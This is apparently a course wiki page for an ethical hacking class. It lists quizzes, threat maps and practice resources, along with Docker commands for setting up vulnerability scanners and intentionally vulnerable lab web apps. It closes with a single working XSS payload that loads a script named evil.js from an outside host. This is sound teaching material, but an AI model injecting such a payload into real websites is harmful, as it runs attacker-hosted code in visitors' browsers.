About Ankan

• https://www.linkedin.com/in/ankanbasu/
• https://www.youtube.com/c/CloudSecurityTrainingConsulting
• https://github.com/cloudsecuritylabs
• https://www.youtube.com/channel/UCe2Zln0z-fjcjzXNtC7p30w

Songs - Basu as a Musician!

• https://www.youtube.com/channel/UCLO0kxm2ZF2V6eGKtqEf4hw
• https://distrokid.com/hyperfollow/shrabantibasu/bikeler-sona-rode

Deepfake

https://www.businessinsider.in/tech/news/everyone-looked-real-deepfake-video-meeting-scam-with-ceos-digital-avatar-costs-company-25-6-mn/articleshow/107418961.cms

GDPR enforcement tracker

DNStwist

https://dnstwist.it/

ISO river

• for downloading OS images

Interesting Read on number of attacks

• https://techjury.net/blog/how-many-cyber-attacks-per-day/
• https://explodingtopics.com/blog/cybersecurity-stats
• https://www.mitnicksecurity.com/blog/red-team-operations-vs.-penetration-testing

Real time cyber attack maps

• https://www.secureworld.io/industry-news/6-live-cyber-attack-maps
• https://cybermap.kaspersky.com/
• https://www.deteque.com/live-threat-map/
• https://threatmap.fortiguard.com/
• https://www.fireeye.com/cyber-map/threat-map.html
• https://threatmap.bitdefender.com/
• https://securitycenter.sonicwall.com/m/page/worldwide-attacks
• https://threatbutt.com/map/
• https://talosintelligence.com/vulnerability_reports

Vulnerability Scanners

OpenVAS https://192.168.0.200

• https://hub.docker.com/r/atomicorp/openvas/
• sudo docker run -d -p 443:443 --name openvas atomicorp/openvas
• visit https://IP

Nessus https://192.168.0.200:8834/

• sudo docker pull tenableofficial/nessus
• sudo docker run -d -p 8834:8834 -e ACTIVATION_CODE=YOUR-OWN-CODE -e USERNAME=admin -e PASSWORD=admin --name nessus tenableofficial/nessus
• visit https://IP:8834

Qualys

Kahoot

• Class 1 - Intro to Ethical Hacking: https://kahoot.it/challenge/?quiz-id=d8eb3b25-0c49-437e-99f8-63c8634a5dd9&single-player=true
• Class 2 - Network Scanning: https://kahoot.it/challenge/?quiz-id=007f13c8-7e85-406c-9484-ab93c1f1ff16&single-player=true
• Class 3 - On Path/ MITM: https://kahoot.it/challenge/?quiz-id=4e74d541-1fd0-42c9-97b4-c9184809562a&single-player=true
• Class 4 - Brute Force: - https://kahoot.it/challenge/?quiz-id=6d3c7c5a-4303-4e06-92e0-65dc5972bccc&single-player=true
• Class 5 - Social Engineering - https://kahoot.it/challenge/?quiz-id=38b11494-cb5e-4df8-9e09-c1d62901af29&single-player=true
• Class 6 - Infrastructure Attacks - https://kahoot.it/challenge/?quiz-id=da5bf883-9137-49fc-af5c-c211affe9f44&single-player=true
• Class 7 - Windows Privilege Escalation - https://kahoot.it/challenge/?quiz-id=ef8b2962-39db-49fe-9503-3e82fc65558e&single-player=true
• Class 8 - Linux Privilege Escalation - https://kahoot.it/challenge/?quiz-id=ba63bd15-8e28-43fa-b9f9-641edeed1ae7&single-player=true
• Class 9 - Web Application Fundamentals - https://kahoot.it/challenge/?quiz-id=b0f436ef-befb-4599-9029-c5ab4c3e36c6&single-player=true
• Class 10 - XSS and File Inclusion - https://kahoot.it/challenge/?quiz-id=230c0827-9c01-43b8-b6bb-2980dd0c78d4&single-player=true
• Class 11 - SQL Injection https://kahoot.it/challenge/?quiz-id=ccfc9c8e-af1d-447f-89d9-193e799904e1&single-player=true
• Final Exam Review: https://kahoot.it/challenge/?quiz-id=2c2d733d-45d8-43d3-a99e-2d6e1aae7025&single-player=true

Setup Vulnerable Webapps

bWAPP - An extremely buggy web app

• sudo docker run -d -p 8000:80 raesene/bwapp
• http://192.168.0.200:8000/install.php
• http://192.168.0.200:8000/login.php

Zero Bank

• http://zero.webappsecurity.com [ Go from inside Kali, you will need TLS 1.1 support!!]

Juice Shop

• Juice Shop: https://owasp.org/www-project-juice-shop/
• https://hub.docker.com/r/bkimminich/juice-shop
• sudo docker run -d -p 9000:80 bkimminich/juice-shop

Metasploitable http://192.168.0.200:9999/

• sudo docker run -d -p 9999:80 --name meta2 khalifarsm/metaspoitable2
• Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8

Broken Web App http://192.168.0.202/

• OWASP Broken Web Applications: https://sourceforge.net/projects/owaspbwa/files/

XVWA http://192.168.0.200:9090/xvwa/

• Xtreme Vulnerable Web Application - https://github.com/0xL1mb0/xvwa-1 [use Docker - https://github.com/tuxotron/xvwa_lamp_container]
• sudo docker run --name xvwa -d -p 9090:80 tuxotron/xvwa

Class Notes:

• Class 1: https://github.com/cloudsecuritylabs/ethicalhackingclass/wiki/Class-1---Intro-to-Ethical-Hacking
• Class 2: https://github.com/cloudsecuritylabs/ethicalhackingclass/wiki/Class-2---Network-Scanning

Tools for taking notes

• Keeppass
• greenshot -https://getgreenshot.org/downloads/
• https://lucid.app/

Cool resources

• https://www.vulnhub.com/
• https://download.vulnhub.com/stapler/slides.pdf
• https://tryhackme.com/
• https://www.hackthebox.com/hacker/pricing

Welcome to the ethical hacking class wiki!

• Break stuff!
• class to apply all knowledge acquired so far
• https://overthewire.org/wargames/bandit/ - Excellent for Linux, cyber security
• Capture the Flag: https://ctftime.org/
• NRCC Hackers!! https://www.nr.edu/cybersecurity/events.php
• SANS CyberStart - https://www.sans.org/media/cyberstart/Virginia-CyberStart-Report.pdf
• security is a lifestyle
• Dumpster diving - Legal! https://legalornot.com/is-dumpster-diving-legal-or-not/
• Hackers - Read, Grey, Purple
• Information Security vs Cyber Security - https://www.devry.edu/blog/information-vs-cyber-security.html
• Defcon https://defcon.org/

Worlds Biggest Data Breaches

• https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Security Podcast

• https://talosintelligence.com/podcasts/shows/beers_with_talos
• https://darknetdiaries.com/

The height of windows patch

• https://www.zdnet.com/article/after-almost-two-decades-the-mars-express-gets-a-software-update/

MySpace Sam Kamkar

https://www.youtube.com/watch?v=DtnuaHl378M

Crazy XSS Demo

<img src=1 onerror="s=document.createElement('script');s.src='//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s);">